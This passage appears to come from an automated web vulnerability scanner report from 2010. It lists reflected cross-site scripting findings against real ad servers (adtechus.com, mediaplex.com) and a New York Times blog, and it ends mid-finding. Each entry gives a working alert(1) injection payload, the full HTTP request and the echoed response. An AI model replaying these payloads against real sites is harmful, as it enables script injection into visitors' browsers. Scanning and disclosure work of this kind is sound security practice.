Path:   /addyn/3.0/5294.1/1352321/0/170/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bae8"-alert(1)-"0dbc0ab70d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5294.1/1352321/0/170/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=685;misc=1290207941511;aduho=-360;rdclick=http://ads.olivebrandresponse.com/clk?2,13%3B3ff77a17b51d6ab4%3B12c66643d5d,0%3B%3B%3B130950044,Z4UBAC2JEwBShFcAAAAAAG.XFwAAAAAAAABUAAIAAAAAAAEABAAGEhnHHwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAXT1kZiwBAAAAAAAAAGJlODY4OWRlLWY0MzEtMTFkZi05MzFhLTAwMzA0OGQ3MjAyOAAzmSoAAAA=,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F1135723%2F0%2F170%2FAdId%3D1014032%3BBnId%3D2%3Bitime%3D208031272%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,&3bae8"-alert(1)-"0dbc0ab70d1=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?Z4UBAC2JEwBShFcAAAAAAG.XFwAAAAAAAABUAAIAAAAAAAEABAAGEhnHHwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADKhJdvoecvCf25CFow9MwH6OdzThKykVRSmPcYAAAAAA==,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F1135723%2F0%2F170%2FAdId%3D1014032%3BBnId%3D2%3Bitime%3D208031272%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,Z%3D300x250%26x%3Dhttp%253A%252F%252Fadserver%252Eadtechus%252Ecom%252Fadlink%252F5214%252F1135723%252F0%252F170%252FAdId%253D1014032%253BBnId%253D2%253Bitime%253D208031272%253Bkey%253D%252527%252527aee2d%255F%255F%255F%255F%255F%252Ftitle%255F%255F%255F%255F%255F%255F%255F%255F%255F%255Fscript%255F%255F%255F%255F%255Falert%25281%2529%255F%255F%255F%255F%255F%252Fscript%255F%255F%255F%255F%255FHoyt%252520LLC%252520PoC%252520XSS%25252011%252D19%252D2010%253Bnodecode%253Dyes%253Blink%253D%2524%26s%3D1280301%26_salt%3D2129417328%26X%3D5735503%2C5735521%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.toronto.com%252FsearchResults%253Fq%253D%27%27aee2d_____%252Ftitle__________script_____alert%281%29_____%252Fscript_____Hoyt%252520LLC%252520PoC%252520XSS%25252011-19-2010%26r%3D1,be8689de-f431-11df-931a-003048d72028
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,&3bae8"-alert(1)-"0dbc0ab70d1=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adl
...[SNIP]...

2.157. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffc1a"><script>alert(1)</script>f464e7a61d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframeffc1a"><script>alert(1)</script>f464e7a61d8/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addynffc1a"><script>alert(1)</script>f464e7a61d8/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

2.158. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6d30"><script>alert(1)</script>f1064d9662f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0a6d30"><script>alert(1)</script>f1064d9662f/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0a6d30"><script>alert(1)</script>f1064d9662f/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

2.159. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8678c"><script>alert(1)</script>510513af82c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/52358678c"><script>alert(1)</script>510513af82c/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/52358678c"><script>alert(1)</script>510513af82c/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

2.160. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33918"><script>alert(1)</script>fea0b6ed2f9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/113160633918"><script>alert(1)</script>fea0b6ed2f9/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/113160633918"><script>alert(1)</script>fea0b6ed2f9/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

2.161. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb448"><script>alert(1)</script>c9e2446ad38 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0bb448"><script>alert(1)</script>c9e2446ad38/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0bb448"><script>alert(1)</script>c9e2446ad38/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

2.162. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8dfb"><script>alert(1)</script>8694302b385 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154c8dfb"><script>alert(1)</script>8694302b385/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154c8dfb"><script>alert(1)</script>8694302b385/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

2.163. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98a9c"><script>alert(1)</script>259f349a369 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH98a9c"><script>alert(1)</script>259f349a369;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH98a9c"><script>alert(1)</script>259f349a369;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

2.164. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [cookie parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of the cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf069"><script>alert(1)</script>405ed403a5b was submitted in the cookie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001cf069"><script>alert(1)</script>405ed403a5b HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001cf069"><script>alert(1)</script>405ed403a5b;adiframe=y">
...[SNIP]...

2.165. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ec76"><script>alert(1)</script>cffc4afe490 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&9ec76"><script>alert(1)</script>cffc4afe490=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 297

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&9ec76"><script>alert(1)</script>cffc4afe490=1;adiframe=y">
...[SNIP]...

2.166. http://altfarm.mediaplex.com/ad/js/10433-99705-1629-12 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/10433-99705-1629-12

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27da1'-alert(1)-'06d8b2d8adc was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/10433-99705-1629-12?mpt=447461135627da1'-alert(1)-'06d8b2d8adc&mpvc=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000914237/cstr=26255436=_4ce92cd7,4474611356,708689^914237^1^0,1_/xsxdata=$xsxdata/bnum=26255436/optn=64?trg= HTTP/1.1
Accept: */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: altfarm.mediaplex.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: svid=793051180246; mojo3=14302:2042/16924:36291/10433:1629/6726:1178/9608:1178/13001:2007

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=10433:1629/14302:2042/16924:36291/6726:1178/9608:1178/13001:2007; expires=Wed, 21-Nov-2012 6:11:40 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 424
Date: Sun, 21 Nov 2010 14:30:15 GMT

document.write('<a target="_blank" href="http://r1.ace.advertising.com/click/site=0000708689/mnum=0000914237/cstr=26255436=_4ce92cd7,4474611356,708689^914237^1^0,1_/xsxdata=$xsxdata/bnum=26255436/optn=64?trg=http://altfarm.mediaplex.com/ad/ck/10433-99705-1629-12?mpt=447461135627da1'-alert(1)-'06d8b2d8adc">
...[SNIP]...

2.167. http://altfarm.mediaplex.com/ad/js/10433-99705-1629-12 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/10433-99705-1629-12

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff909'%3balert(1)//6061cabb69a was submitted in the mpvc parameter. This input was echoed as ff909';alert(1)//6061cabb69a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/10433-99705-1629-12?mpt=4474611356&mpvc=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000914237/cstr=26255436=_4ce92cd7,4474611356,708689^914237^1^0,1_/xsxdata=$xsxdata/bnum=26255436/optn=64?trg=ff909'%3balert(1)//6061cabb69a HTTP/1.1
Accept: */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: altfarm.mediaplex.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: svid=793051180246; mojo3=14302:2042/16924:36291/10433:1629/6726:1178/9608:1178/13001:2007

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=10433:1629/14302:2042/16924:36291/6726:1178/9608:1178/13001:2007; expires=Wed, 21-Nov-2012 5:01:44 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 411
Date: Sun, 21 Nov 2010 14:30:17 GMT

document.write('<a target="_blank" href="http://r1.ace.advertising.com/click/site=0000708689/mnum=0000914237/cstr=26255436=_4ce92cd7,4474611356,708689^914237^1^0,1_/xsxdata=$xsxdata/bnum=26255436/optn=64?trg=ff909';alert(1)//6061cabb69ahttp://altfarm.mediaplex.com/ad/ck/10433-99705-1629-12?mpt=4474611356">
...[SNIP]...

2.168. http://altfarm.mediaplex.com/ad/js/10433-99705-1629-12 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/10433-99705-1629-12

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ce40'%3balert(1)//9a1e961bef2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8ce40';alert(1)//9a1e961bef2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/10433-99705-1629-12?mpt=4474611356&mpvc=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000914237/cstr=26255436=_4ce92cd7,4474611356,708689^914237^1^0,1_/xsxdata=$xsxdata/bnum=26255436/optn=64?trg=&8ce40'%3balert(1)//9a1e961bef2=1 HTTP/1.1
Accept: */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: altfarm.mediaplex.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: svid=793051180246; mojo3=14302:2042/16924:36291/10433:1629/6726:1178/9608:1178/13001:2007

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: mojo3=10433:1629/14302:2042/16924:36291/6726:1178/9608:1178/13001:2007; expires=Wed, 21-Nov-2012 6:46:42 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 414
Date: Sun, 21 Nov 2010 14:30:19 GMT

document.write('<a target="_blank" href="http://r1.ace.advertising.com/click/site=0000708689/mnum=0000914237/cstr=26255436=_4ce92cd7,4474611356,708689^914237^1^0,1_/xsxdata=$xsxdata/bnum=26255436/optn=64?trg=&8ce40';alert(1)//9a1e961bef2=1http://altfarm.mediaplex.com/ad/ck/10433-99705-1629-12?mpt=4474611356">
...[SNIP]...

2.169. http://artsbeat.blogs.nytimes.com/2010/11/18/anatomy-of-a-scene-harry-potter-and-the-deathly-hallows-part-1/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://artsbeat.blogs.nytimes.com
Path:   /2010/11/18/anatomy-of-a-scene-harry-potter-and-the-deathly-hallows-part-1/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54a37"><script>alert(1)</script>a669c72a928 was submitted in the src parameter. This input was echoed as 54a37\"><script>alert(1)</script>a669c72a928 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

